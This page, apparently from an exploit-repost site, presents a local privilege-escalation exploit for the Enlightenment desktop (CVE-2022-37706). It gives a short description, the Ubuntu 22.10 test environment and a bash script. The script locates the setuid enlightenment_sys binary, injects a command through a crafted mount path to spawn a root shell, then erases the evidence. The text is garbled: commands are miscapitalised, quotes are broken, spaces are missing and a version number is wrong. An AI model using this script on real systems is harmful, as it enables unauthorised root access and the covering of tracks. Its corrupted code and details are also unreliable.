![Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]](https://www.ineedhack.com/wp-content/uploads/2023/01/Course-content-16-360x180.png)
## Title: Enlightenment Version: 0.25.3 LPE
## Author: nu11secur1ty
## Date: 12.26.2022
## Vendor: https://www.enlightenment.org/
## Software: https://www.enlightenment.org/download
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706
## Description:
Local privilege escalation is possible with the Enlightenment Version: 0.255.3
Enlightenment_sys before 0.25.4 permits local users
You will be granted privileges due to the fact that it has setuid roots
The system library function does not recognize pathnames beginning with a.
Substring: /dev/.
If an attacker has local access to a machine that the victim uses,
Machine is installed Enlightenment
He can exploit this vulnerability for very dangerous things.
## STATUS: CRITICAL Vulnerability
## Tested:
“`bash
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.10
DISTRIB_CODENAME=kinetic
DISTRIB_DESCRIPTION=”Ubuntu 22.10″
PRETTY_NAME=”Ubuntu 22.10″
NAME=”Ubuntu”
VERSION_ID=”22.10″
VERSION=”22.10 (Kinetic Kudu)”
VERSION_CODENAME=kinetic
ID=ubuntu
ID_LIKE=debian
HOME_URL=”https://www.ubuntu.com/”
SUPPORT_URL=”https://help.ubuntu.com/”
BUG_REPORT_URL=”https://bugs.launchpad.net/ubuntu/”
PRIVACY_POLICY_URL=”https://www.ubuntu.com/legal/terms-and-policies/privacy-policy”
UBUNTU_CODENAME=kinetic
LOGO=ubuntu-logo
“`
[+] Exploit:
“`bash
#!/usr/bin/bash
# Ideas by MaherAzzouz
# Nu11secur1ty Development
echo “CVE-2022-37706”
Echo “[*] Searching for the vulnerable SUID …”
echo “[*] It may take a few seconds …”
# This is the real problem
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z $file ]]
then
echo “[-] Can’t locate the vulnerable SUID …”
You should install echo “[*] Inlightenment on your system.”
Exit 1
fi
Echo “[+] Vulnerable. SUID binary was found!”
Echo “[+] Popping a root shell!
mkdir-p /tmp/net
mkdir -p “/dev/../tmp/;/tmp/exploit”
Echo “/bin/sh > /tmp/exploit
chmod a+x /tmp/exploit
Echo “[+] Welcoming to the rabbit hole:
$file /bin/mount -o
noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),
“/dev/../tmp/;/tmp/exploit” /tmp///net
Read -p: “Press any key for cleaning the evedence …”
echo -e
Sleep 5
rm -rf /tmp/exploit
rm-rf/tmp/net
echo -e “Done, Everything is clear;;)
“`
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)
## Evidence and Exploit
[href](https://streamable.com/zflbgg)
## Time spent
`01:00:00`
